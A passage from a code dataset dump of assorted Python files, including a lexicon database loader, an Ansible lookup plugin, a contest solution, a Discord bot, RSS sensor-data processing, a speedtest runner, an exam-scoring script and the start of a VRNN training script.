id='%s-%s' % (id_, row['id'].replace('.', '-')),\n language=lang,\n contribution=vocab,\n parameter=data['Meaning'][row['id']])\n\n DBSession.flush()\n\n ue = common.UnitParameter(id='ue', name='usage')\n DBSession.add(ue)\n DBSession.flush()\n\n for name in d.values('ue'):\n p = data.add(common.UnitDomainElement, name, id='ue-'+slug(name), name=name)\n p.unitparameter_pk = ue.pk\n\n for i, row in enumerate(d.entries):\n w = data.add(\n models.Word, row.get('lx'),\n id='%s-%s' % (id_, i),\n name=row.get('lx'),\n description='; '.join(row.getall('ge')),\n dictionary=vocab)\n w.language = lang\n\n DBSession.flush()\n\n for marker in [\n 'bw', 'ce', 'cf', 'de', 'dn', 'et', 'gv', 'lc', 'mr', 'nt',\n 'ph', 're', 'rn', 'sc', 'se', 'un', 'va',\n ]:\n for k, name in enumerate(row.getall(marker)):\n DBSession.add(\n common.Unit_data(key=marker, value=name, ord=k, object_pk=w.pk))\n\n for j, name in enumerate(row.getall('ue')):\n DBSession.add(common.UnitValue(\n id='ue-%s-%s' % (i, j),\n unit=w,\n unitparameter=ue,\n unitdomainelement=data['UnitDomainElement'][name],\n contribution=vocab,\n ))\n\n meaning_prefix = ''\n for j, name in enumerate(row.getall('ps')):\n if POS_MAP[name] == 'verb' or ' verb' in POS_MAP[name]:\n meaning_prefix = 'to '\n elif POS_MAP[name] == 'noun':\n meaning_prefix = 'the '\n if j > 0:\n # only one part-of-speech value per entry!\n raise ValueError\n DBSession.add(common.UnitValue(\n id='pos-%s-%s' % (id_, i),\n unit=w,\n unitparameter=data['UnitParameter']['pos'],\n unitdomainelement=data['UnitDomainElement'][POS_MAP[name]],\n contribution=vocab,\n ))\n\n for j, name in enumerate(row.getall('ge')):\n if name.startswith(meaning_prefix):\n meaning_prefix = ''\n key = '%s%s-%s' % (meaning_prefix, name.lower(), id_)\n if key in data['ValueSet']:\n value = data.add(\n models.Counterpart, '%s-%s' % (i, j),\n id='%s-%s-%s' % (id_, i, j),\n name=row.get('lx'),\n valueset=data['ValueSet'][key],\n word=w)\n\n if row.get('xv'):\n ex = data.add(\n common.Sentence, i,\n id='%s-%s' % (id_, i),\n name=row.get('xv'),\n description=row.get('xe', default=''))\n DBSession.add(models.WordSentence(word=w, sentence=ex))\n\n DBSession.flush()\n\n DBSession.add(common.ContributionContributor(\n ord=1,\n primary=True,\n contributor_pk=contrib.pk,\n contribution_pk=vocab.pk))\n\n DBSession.flush()\n","sub_path":"dictionaria/loader/ayalalag.py","file_name":"ayalalag.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"213568888","text":"# python 3 headers, required if submitting to Ansible\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = \"\"\"\n lookup: file\n author: Daniel Hokka Zakrisson \n version_added: \"0.9\"\n short_description: read file contents\n description:\n - This lookup returns the contents from a file on the Ansible controller's file system.\n options:\n _terms:\n description: path(s) of files to read\n required: True\n notes:\n - if read in variable context, the file can be interpreted as YAML if the content is valid to the parser.\n - this lookup does not understand globing --- use the fileglob lookup instead.\n\"\"\"\nfrom ansible.errors import AnsibleError, AnsibleParserError\nfrom ansible.module_utils._text import to_text\nfrom ansible.plugins.lookup import LookupBase\nfrom ansible.utils.display import Display\n\ndisplay = Display()\n\n\nclass LookupModule(LookupBase):\n\n def run(self, terms, variables=None, 
**kwargs):\n\n\n # lookups in general are expected to both take a list as input and output a list\n # this is done so they work with the looping construct 'with_'.\n ret = []\n\n image = kwargs['image']\n try:\n if '@' in image:\n repo = image.split('@')[0]\n ret.append(to_text(repo))\n elif ':' in image:\n repo = image.split(':')[0]\n ret.append(to_text(repo))\n else:\n ret.append(to_text(image))\n except AnsibleParserError:\n raise AnsibleError(\"could not locate file in lookup: %s\" % image)\n return ret\n","sub_path":"plugins/lookup/image_repo.py","file_name":"image_repo.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"526169817","text":"# https://dmoj.ca/problem/dmopc18c2p4\n# https://dmoj.ca/submission/2948484\n\nfrom sys import exit\nn,m = tuple(map(int,input().split()))\ndamage = list(map(int,input().split()))\nfor i in range(1,n):\n damage[i] += damage[i-1]\n\nif damage[-1] < m:\n print(-1)\n exit(0)\n\nshortest = n\ndamage = [0]+damage\n\ni = 0\nj = 1\nwhile i < n+1 > j:\n if damage[j] - damage[i] < m:\n j+=1\n else:\n i+=1\n shortest = min(shortest,j-i)\nprint(shortest+1)\n","sub_path":"dmoj/DMOPC/dmopc18c2p4.py","file_name":"dmopc18c2p4.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149572756","text":"import logging\nimport sys\nimport inspect\n\n# logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(message)s')\n# logging.basicConfig(stream=sys.stdout, level=logging.INFO, \n# format='%(asctime)s %(filename)s:%(lineno)d - %(message)s')\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='- %(message)s')\n\ndef prefix():\n callerframerecord = inspect.stack()[2]\n frame = callerframerecord[0]\n info = inspect.getframeinfo(frame)\n txt = '{}:{}'.format(info.filename,info.lineno)\n return txt\n\ndef info(msg):\n logging.info(\"{} {}\".format(prefix(), msg))\n\n# display once each message\nonceMarkers = []\ndef once(msg):\n marker = prefix()\n if (marker not in onceMarkers):\n onceMarkers.append(marker)\n logging.info(\"{} {}\".format(marker, msg))\n\n# input x must be tensor\ndef describe(x):\n logging.info(\"{} Type {},Shape{},Value:\\n{}\".format(prefix(),x.type(),x.shape,x))\n# input x must be tensor\ndescribeOnceMarkers = []\ndef describeOnce(x):\n marker = prefix()\n if (marker not in describeOnceMarkers):\n describeOnceMarkers.append(marker)\n logging.info(\"{} Type {},Shape{},Value:\\n{}\".format(prefix(),x.type(),x.shape,x))\n\n\n ","sub_path":"py/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504854859","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = '$')\n\n@client.event\nasync def on_ready():\n print(\"bot online\")\n\n@client.command()\nasync def ping(message):\n await message.send(\"pong!\")\n\n\nclient.run(os.getenv(\"DISCORD_TOKEN\")) #get your bot token and make a file called \".env\" then inside the file write TOKEN=put your api key here example in env.txt\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"229665875","text":"\n\n#class header\nclass _REFORM():\n\tdef 
__init__(self,): \n\t\tself.name = \"REFORM\"\n\t\tself.definitions = [u\"to make an improvement, especially by changing a person's behaviour or the structure of something: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_reform.py","file_name":"_reform.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183038819","text":"# This script processes the RSS data collected during the ground-truth phase. A\n# person stood inside squares on the floor and moved around for 30 seconds. He\n# then moved to the next square on the path.\n#\n# The purpose of this script is to compute the histograms, mean, and variance \n# for each link-box pair. A sister-script ground_truth_viewer.py can then be\n# run to look at an image of the room according to a links mean RSS value.\n#\n# We hope to then run a separate script that will estimate the ground truth \n# statistics. We can then compare images.\n\nimport numpy as np\n\n# This function takes the current line from \ndef parse_line(line):\n line_out = line.split(' ')\n tmp = np.array([float(item) for item in line_out])\n rss = tmp[:-1]\n time_stamp = tmp[-1]\n return rss, time_stamp\n\n# File names for data\nrss_fname = 'data/rss_data/rs_room/rss_rs_room_ground_truth.txt'\nnode_loc_fname = 'data/node_loc_data/rs_room/node_loc_2016_08_30.txt'\npivot_coord_fname = 'data/true_loc_data/rs_room/pivot_coords_2016_08_30.txt'\npivot_idx_fname = 'data/true_loc_data/rs_room/pivot_idx_gt_2016_08_30.txt'\n\n# File names for results\nmean_mat_fname = 'data/results/rs_room/mean_mat.txt'\nmed_mat_fname = 'data/results/rs_room/median_mat.txt'\nvar_mat_fname = 'data/results/rs_room/var_mat.txt'\niqr_mat_fname = 'data/results/rs_room/iqr_mat.txt'\n\n# Get the coordinates for each box\npivot_coords = np.loadtxt(pivot_coord_fname)\npivot_coords_x = np.unique(pivot_coords[:,0])\npivot_coords_y = np.unique(pivot_coords[:,1])\nxv,yv = np.meshgrid(pivot_coords_x,pivot_coords_y)\nxvf = xv.flatten()\nyvf = yv.flatten()\n\n# Get the pivot indexes\npivot_idx = np.loadtxt(pivot_idx_fname).astype('int')\n\n# Initialize some variables\nt0 = 0. # time zero\ncur_box_idx = -3 # the current box we are in\nhigh_time = 30.\n\n\n# loop through each line of the ground truth rss file\nwith open(rss_fname,'r') as f:\n for line in f:\n \n # Parse the rss and time stamp from the current measurement\n rss, time_stamp = parse_line(line)\n \n # Get the zeroed time stamp, and set variables that need to be\n # initialized on the first measurement\n if t0 == 0.:\n t0 = time_stamp\n \n mean_mat = np.zeros((rss.size,xvf.size+1))\n med_mat = np.zeros((rss.size,xvf.size+1))\n var_mat = -1*np.ones((rss.size,xvf.size+1))\n iqr_mat = -1*np.ones((rss.size,xvf.size+1))\n \n rss_buffer = np.zeros((rss.size,300))\n cur_buffer_idx = 0\n cur_time = time_stamp-t0\n \n # Enter here if we made a transition to the next box. In this block, we \n # compute the mean and variance of the last 30 seconds of RSS and then\n # save these statistics to the matrix holding the means and variances\n # for each link and pixel\n if cur_time>high_time:\n \n # Change 127 values to NAN so that we can easily compute the mean \n # and variance\n rss_buffer[rss_buffer == 127.] 
= np.NAN\n tmp_mean = np.nanmean(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_var = np.nanvar(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_med = np.nanmedian(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_iqr = np.diff(np.nanpercentile(rss_buffer[:,:cur_buffer_idx-1], [25, 75],axis=1))\n \n # This is a place holder so that I can eventually put in the code\n # to save histograms for each pixel and link pair\n # save_histograms()\n \n # If we are at the vacant room index or occupied box index, get the \n # correct pixel index and save the mean and variance to the matrix\n if cur_box_idx == -2:\n cur_pixel_idx = np.zeros(xvf.size+1,dtype='bool')\n cur_pixel_idx[-1] = True\n \n mean_mat[:,cur_pixel_idx] = tmp_mean.T\n med_mat[:,cur_pixel_idx] = tmp_med.T\n var_mat[:,cur_pixel_idx] = tmp_var.T\n iqr_mat[:,cur_pixel_idx] = tmp_iqr\n elif cur_box_idx>=0:\n cur_coord = pivot_coords[pivot_idx[cur_box_idx]-1]\n cur_pixel_idx = (cur_coord[0] == xvf) & (cur_coord[1] == yvf)\n \n mean_mat[:,cur_pixel_idx] = tmp_mean.T\n med_mat[:,cur_pixel_idx] = tmp_med.T\n var_mat[:,cur_pixel_idx] = tmp_var.T\n iqr_mat[:,cur_pixel_idx] = tmp_iqr\n \n # Reset the RSS buffer and buffer index\n rss_buffer[:,:] = 0\n cur_buffer_idx = 0 \n \n # Update the high time and current box index\n cur_box_idx += 1\n high_time+=30.\n \n # There are no more boxes visited after the 100 index\n if cur_box_idx >= 100:\n break\n \n # Add the current rss to the buffer and update the index\n rss_buffer[:,cur_buffer_idx] = rss\n cur_buffer_idx+=1\n\nnp.savetxt(mean_mat_fname, mean_mat, delimiter=' ')\nnp.savetxt(med_mat_fname, med_mat, delimiter=' ')\nnp.savetxt(var_mat_fname, var_mat, delimiter=' ')\nnp.savetxt(iqr_mat_fname, iqr_mat, delimiter=' ')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ground_truth_creator.py","file_name":"ground_truth_creator.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465938402","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport time\n\nfrom lib.log import *\nfrom lib import log\nfrom lib.api import RestGraphqlApi\nimport plugins\n\n\ndef parse_arguments():\n \"\"\"Get commandline arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description='Run speedtest and write results to json file.')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--host', default='localhost')\n parser.add_argument('--log-file', default=log.LOGFILE)\n parser.add_argument('--max-delay', type=int, default=0)\n parser.add_argument('--results-file', default='/var/lib/128technology/t128-speedtest-results.json')\n parser.add_argument('--test', action='append', default=[])\n args = parser.parse_args()\n return args\n\n\ndef get_interface_stats(host):\n stats = {}\n api = RestGraphqlApi(host=host)\n query = '{ allNodes { nodes { deviceInterfaces { nodes { networkInterfaces { nodes { name } } type state { operationalStatus } } } } } }'\n try:\n interfaces = api.query(query).json()['data']['allNodes']['nodes'][0]['deviceInterfaces']['nodes']\n for interface in interfaces:\n network_interface_name = interface['networkInterfaces']['nodes'][0]['name']\n # ignore host interfaces\n if interface['type'] == 'host':\n continue\n stats[network_interface_name] = {\n 'type': interface['type'],\n 'up': interface['state']['operationalStatus'] == 'OPER_UP',\n }\n except:\n fatal('Could not retrieve interfaces status')\n return stats\n\n\ndef write_results(filename, 
results):\n with open(filename, 'w') as fd:\n json.dump(results, fd)\n\n\ndef main():\n args = parse_arguments()\n log.DEBUG = args.debug\n log.LOGFILE = args.log_file\n results = {}\n stats = get_interface_stats(args.host)\n plugins.load_plugins()\n # iterate over plugins and run get_results for each plugin\n # which is configured and where assigned interfaces are UP\n for plugin in plugins.plugins:\n test_interfaces = [\n x.split(':')[1] for x in args.test if x.startswith(plugin.name)\n ]\n for interface in test_interfaces:\n if interface not in stats:\n debug('Interface', interface, 'is unknown on this router')\n continue\n if not stats[interface]['up']:\n debug('Interface', interface, 'is down - skipping')\n continue\n _interface = interface.replace('local-wan', 'wan')\n result = plugin.get_results(_interface, stats, args.max_delay)\n result['ts'] = int(time.time())\n if plugin.name not in results:\n results[plugin.name] = {}\n results[plugin.name][interface] = result\n write_results(args.results_file, results)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"files/speedtest/t128-speedtest-runner.py","file_name":"t128-speedtest-runner.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307983707","text":"#!/usr/bin/env python\n\n# Copyright 2014 OpenStack Foundation\n# Copyright 2014 SUSE Linux Products GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport yaml\nimport sys\n\nlayout = yaml.load(open('zuul/layout.yaml'))\n\n\ndef check_merge_template():\n \"\"\"Check that each job has a merge-check template.\"\"\"\n\n errors = False\n print(\"\\nChecking for usage of merge template\")\n print(\"====================================\")\n for project in layout['projects']:\n if project['name'] == 'z/tempest':\n continue\n try:\n correct = False\n for template in project['template']:\n if template['name'] == 'merge-check':\n correct = True\n if not correct:\n raise\n except:\n print(\"Project %s has no merge-check template\" % project['name'])\n errors = True\n return errors\n\n\ndef normalize(s):\n \"Normalize string for comparison.\"\n return s.lower().replace(\"_\", \"-\")\n\n\ndef check_sections():\n \"\"\"Check that the projects are in alphabetical order per section.\"\"\"\n\n print(\"Checking sections for alphabetical order\")\n print(\"========================================\")\n # Note that the file has different sections and we need to sort\n # entries within these sections.\n errors = False\n # Skip all entries before the first section header\n firstEntry = True\n last = \"\"\n for line in open('zuul/layout.yaml', 'r'):\n if line.startswith('# Section:'):\n last = \"\"\n section = line[10:].strip()\n print(\"Checking section '%s'\" % section)\n firstEntry = False\n if line.startswith(' - name: ') and not firstEntry:\n current = line[10:].strip()\n if (normalize(last) > normalize(current) and\n last != 'z/tempest'):\n print(\" Wrong alphabetical order: %(last)s, 
%(current)s\" %\n {\"last\": last, \"current\": current})\n errors = True\n last = current\n return errors\n\n\ndef check_formatting():\n errors = False\n count = 1\n\n print(\"Checking indents\")\n print(\"================\")\n\n for line in open('zuul/layout.yaml', 'r'):\n if (len(line) - len(line.lstrip(' '))) % 2 != 0:\n print(\"Line %(count)s not indented by multiple of 2:\\n\\t%(line)s\" %\n {\"count\": count, \"line\": line})\n errors = True\n count = count + 1\n\n return errors\n\n\ndef check_all():\n errors = check_sections()\n errors = check_formatting() or errors\n\n if errors:\n print(\"\\nFound errors in layout.yaml!\")\n else:\n print(\"\\nNo errors found in layout.yaml!\")\n return errors\n\nif __name__ == \"__main__\":\n sys.exit(check_all())\n","sub_path":"tools/layout-checks.py","file_name":"layout-checks.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"321806166","text":"import os\nimport pandas as pd\n\n\n# In[75]:\n\n\n# In[15]:\n\n\n# Marking Scheme = \n# Power = 2,4,8 & -1,-2,-4 with break seq\n# Fibo = 2,3,5 & -1,-1,-2 with break seq\n# All or None = (n marks)\nAnswers={\n 'J':{\n 'q1': ['3','03'],'q2': ['5','05','14'],'q3': ['05','5','23'],'q4': ['BONUS','B'],'q5': ['A'],'q6': ['C'],'q7': ['C'],\n 'q8': ['4','04'], 'q9': ['BONUS'], 'q10': ['08','8'],'q11': ['C'],'q12': ['C'],'q13': ['B'],\n 'q14': ['C'],'q15': ['B'],'q16': ['B'],'q17': ['D'],'q18': ['C'],'q19': ['15'],'q20': ['2','3','02','03']\n },\n 'H':{\n 'q1': ['C'],'q2': ['C'],'q3': ['C'],'q4': ['C'],'q5': ['B'],'q6': ['BONUS'],'q7': ['3','03'],\n 'q8': ['9','09'], 'q9': ['4','04'],'q10': ['45'],'q11': ['12'],'q12': ['16'],'q13': ['C'],\n 'q14': ['A'],'q15': ['B'],'q16': ['23'],'q17': ['61'],'q18': ['B'],\n 'q19': ['ABC','ACB','BAC','BCA','CBA','CAB'],'q20': ['C'],\n 'q21': 'B','q22': 'A','q23': 'D','q24': 'D','q25': 'B',\n }\n}\n\n# Fibo is across the sections - Q4,5,6,7,13,\nSections = {\n 'J':{\n 'Power1':{'ques':[1,2,3],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo1':{'ques':[4,5,6,7],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'Power2':{'ques':[8,9,10],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo2':{'ques':[11,12,13,14],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone1':{'ques':[15,16],'marks':9},\n 'allNone2':{'ques':[17,18],'marks':12},\n 'allNone3':{'ques':[19,20],'marks':6},\n },\n\n 'H' : {\n 'allNone1':{'ques':[1],'marks':8},\n 'Power1':{'ques':[2,3,4],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n # 'allNone2':{'ques':[5,6],'marks':12},\n 'allNone2':{'ques':[5,6],'marks':6},\n 'Fibo1':{'ques':[7,8,9,10,11],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone3':{'ques':[12],'marks':8},\n 'Power2':{'ques':[13,14,15],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Proxy1':{'ques':[16,17],'+marks':5,'-marks':3},\n 'Power3':{'ques':[18,19,20],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'TechnoFin':{'ques':[21,22,23,24,25]},\n },\n 'JK' : {\n 'Power1':{'ques':[1,2,3],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo1':{'ques':[4,5,6,7],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'Power2':{'ques':[8,9,10],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo2':{'ques':[11,12,13,14],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone1':{'ques':[15,16],'marks':9},\n 'allNone2':{'ques':[17,18],'marks':12},\n 'allNone3':{'ques':[19,20],'marks':6},\n\n },\n 'HK' : {\n 'allNone1':{'ques':[1],'marks':8},\n 'Power1':{'ques':[2,3,4,5],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 
'allNone2':{'ques':[6],'marks':12},\n 'Fibo1':{'ques':[7,8,9,10,11],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone3':{'ques':[12],'marks':8},\n 'Power2':{'ques':[13,14,15],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Proxy1':{'ques':[16,17],'+marks':5,'-marks':3},\n 'Power3':{'ques':[18,19,20],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n\n },\n}\n\nqNos={\n 'J':['q'+str(i) for i in range(1,21)],\n 'H':['q'+str(i) for i in range(1,26)]\n}\n\n# In[76]:\n\nonce = 0\ndef report(Status,streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks):\n global once\n if(not once):\n once = 1\n print('Question\\tStatus \\t Streak\\tSection \\tMarks_Update\\tMarked:\\tAnswer:')\n \n print('%s \\t %s \\t\\t %s \\t %s \\t %s \\t %s \\t %s ' % (qNo,\n Status,str(streak), '['+scheme+'] ',(str(prevmarks)+' + '+str(currmarks)+' ='+str(marks)),str(marked),str(ans)))\n# check sectionwise only.\ndef evaluate(resp,answers,sections,explain=False):\n marks,num_correct,num_wrong = 0,0,0\n allans = answers.items()\n sectionMarks={}\n prevmarks=0\n prevSectionMarks=0\n for scheme,section in sections.items():\n sectionques = section['ques']\n prevcorrect=None\n allflag=1\n streak=0\n for q in sectionques:\n qNo='q'+str(q)\n ans=answers[qNo]\n marked = resp.get(qNo, 'X')\n if(type(marked)==float or type(marked)==int):\n \tmarked=str(int(marked))\n \n firstQ = sectionques[0]\n lastQ = sectionques[len(sectionques)-1]\n unmarked = marked=='X' or marked==''\n bonus = 'BONUS' in ans\n correct = bonus or (marked in ans)\n inrange=0\n \n# ('q13(Power2) Correct(streak0) -3 + 2 = -1', 'C', ['C'])\n# ('q14(Power2) Correct(streak0) -1 + 2 = 1', 'A', ['A'])\n# ('q15(Power2) Incorrect(streak0) 1 + -1 = 0', 'C', ['B'])\n if(unmarked or int(q)==firstQ):\n streak=0\n elif(prevcorrect == correct):\n streak+=1\n else:\n streak=0\n \n \n if( 'allNone' in scheme):\n #loop on all sectionques\n allflag = allflag and correct\n if(q == lastQ ):\n #at the end check allflag\n prevcorrect = correct\n currmarks = section['marks'] if allflag else 0\n else:\n currmarks = 0\n \n elif('Proxy' in scheme):\n a=int(ans[0])\n #proximity check\n inrange = 1 if unmarked else (float(abs(int(marked) - a))/float(a) <= 0.25)\n currmarks = section['+marks'] if correct else (0 if inrange else -section['-marks']) \n \n elif('Fibo' in scheme or 'Power' in scheme):\n currmarks = section['+seq'][streak] if correct else (0 if unmarked else -section['-seq'][streak]) \n elif('TechnoFin' in scheme):\n currmarks = 0\n else:\n print('Invalid Sections')\n prevmarks=marks\n marks += currmarks\n \n if(explain):\n if bonus:\n report('BonusQ',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif correct:\n report('Correct',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif unmarked:\n report('Unmarked',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif inrange:\n report('InProximity',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n else:\n report('Incorrect',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n if correct:\n num_correct+=1\n elif not unmarked:\n num_wrong+=1\n prevcorrect = correct\n \n sectionMarks[scheme]=marks-prevSectionMarks\n prevSectionMarks=marks\n \n return marks,num_correct,num_wrong,sectionMarks\n\nimport numpy as np\n\n\nkv = 0\n\nQs=['q'+str(i) for i in range(1,21)]+['t'+str(i) for i in 
range(1,6)]\nsheetCols=['batch','error','filename','path','roll']+Qs\nunionSections=['Power1','Power2','Power3','Fibo1','Fibo2','allNone1','allNone2','allNone3','Proxy1','TechnoFin']\nresultSheetCols=sheetCols+['score','num_correct','num_wrong']+unionSections\n\n# y = pd.read_csv('results/multiMarkedSheet.csv')[['roll','score']]\n# y = y.replace(np.nan,'',regex=True)\nx = pd.read_csv('results/badRollSheet.csv')[sheetCols]\nx = x.replace(np.nan,'',regex=True)\n\n\nresultFileJ = 'results/JScoreWithNums'+('KVJNV' if kv else '')+'Results2017_test.csv'\nresultFileH = 'results/HScoreWithNums'+('KVJNV' if kv else '')+'Results2017_test.csv'\nif(not os.path.exists(resultFileJ)):\n with open(resultFileJ,'a') as f:\n results=[resultSheetCols]\n pd.DataFrame(results).to_csv(f,header=False)\nelse:\n print('WARNING : Appending to Previous Result file!')\n\nif(not os.path.exists(resultFileH)):\n with open(resultFileH,'a') as f:\n results=[resultSheetCols]\n pd.DataFrame(results).to_csv(f,header=False)\nelse:\n print('WARNING : Appending to Previous Result file!')\nintQs ={\n'J' : [ 'q'+str(qNo) for qNo in (range(1,4)+range(8,11)+range(19,21))],\n'H'\t:[ 'q'+str(qNo) for qNo in (range(12,13)+range(16,18)+range(7,12))]\n} \n# x[intQs[squad]]=x[intQs[squad]].astype(int)\nexplain=0\nwith open(resultFileJ,'a') as fJ:\n with open(resultFileH,'a') as fH:\n counterx,countery=0,0\n for i,row in enumerate(x.iterrows()):\n # results/allResults\n squad = row[1].roll[0]\n # print(squad)\n # debug=raw_input()\n score,nc,nw,sectionMarks = evaluate(dict(row[1]),Answers[squad],Sections[squad],explain=explain)\n f_ = fJ if squad=='J' else fH\n # print(sectionMarks.items())\n if(explain):\n debug=raw_input()\n secMarks=[]\n for x in range(len(unionSections)):\n try:\n secMarks.append(sectionMarks[unionSections[x]])\n except:\n secMarks.append('')\n pd.DataFrame(list(row[1])+[score,nc,nw]+secMarks).T.to_csv(f_,header=False)\n # y_i=y.iloc[i]\n # scorey = y_i.score\n # rolly = y_i.roll\n # if(scorey!='' and scorey!=0 and score!=int(scorey)):\n # countery+=1\n # print('Error: wrong scores : ',row[1]['roll'],score,rolly,scorey,countery)\n # else:\n # counterx+=1\n # print('Correct score',score,scorey,counterx)\n print(row[1]['roll'],score,nc,nw,sectionMarks)\n","sub_path":"extras/mini_scripts/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":9581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492493733","text":"#### The code is adapted from https://github.com/jych/nips2015_vrnn which is linked to the following reference.\n##Chung, J., Kastner, K., Dinh, L., Goel, K., Courville, A.C., Bengio, Y.: A recurrent latent variable model for sequential data. 
Advances in neural information processing systems 28, 2980–2988 (2015)\n##\nimport os\n\nos.environ['THEANO_FLAGS'] = \"device=cuda,force_device=True,floatX=float32\"\nimport numpy as np\nimport theano\nimport theano.tensor as T\nfrom cle.cle.cost import MSE, Gaussian, KLGaussianGaussian\nfrom cle.cle.data import Iterator\nfrom cle.cle.models import Model\nfrom cle.cle.layers import InitCell\nfrom cle.cle.layers.feedforward import FullyConnectedLayer\nfrom cle.cle.layers.recurrent import LSTM\nfrom cle.cle.train import Training\nfrom cle.cle.train.ext import (\n EpochCount,\n GradientClipping,\n Monitoring,\n Picklize,\n EarlyStopping,\n WeightNorm\n)\nfrom cle.cle.train.opt import RMSProp, Adam\nfrom cle.cle.utils import init_tparams, sharedX\nfrom cle.cle.utils.compat import OrderedDict\nfrom cle.cle.utils.op import Gaussian_sample\nfrom cle.cle.utils.gpu_op import concatenate\n\nfrom datasets.npp import NPP\n\n\ndef main():\n for rnn_dim in [256]:\n pkl_name = 'VRNN_hidden{}'.format(rnn_dim)\n npp_path = './datasets/npp.npy'\n save_path = './models/'\n force_saving_freq = 1\n epoch = 1\n batch_size = 256\n x_dim = 1\n z_dim = 64\n lr = 0.001\n\n p_x_dim = 64\n x2s_dim = 64\n z2s_dim = 64\n q_z_dim = 64\n p_z_dim = 64\n target_dim = x_dim\n\n model = Model()\n\n init_W = InitCell('rand')\n init_U = InitCell('ortho')\n init_b = InitCell('zeros')\n init_b_sig = InitCell('const', mean=0.6)\n\n train_data = NPP(name='train', path=npp_path)\n\n x, y = train_data.theano_vars()\n\n x_1 = FullyConnectedLayer(name='x_1',\n parent=['x_t'],\n parent_dim=[x_dim],\n nout=x2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n x_2 = FullyConnectedLayer(name='x_2',\n parent=['x_1'],\n parent_dim=[x2s_dim],\n nout=x2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n z_1 = FullyConnectedLayer(name='z_1',\n parent=['z_t'],\n parent_dim=[z_dim],\n nout=z2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n z_2 = FullyConnectedLayer(name='z_2',\n parent=['z_1'],\n parent_dim=[z2s_dim],\n nout=z2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n rnn = LSTM(name='rnn',\n parent=['x_2', 'z_2'],\n parent_dim=[x2s_dim, 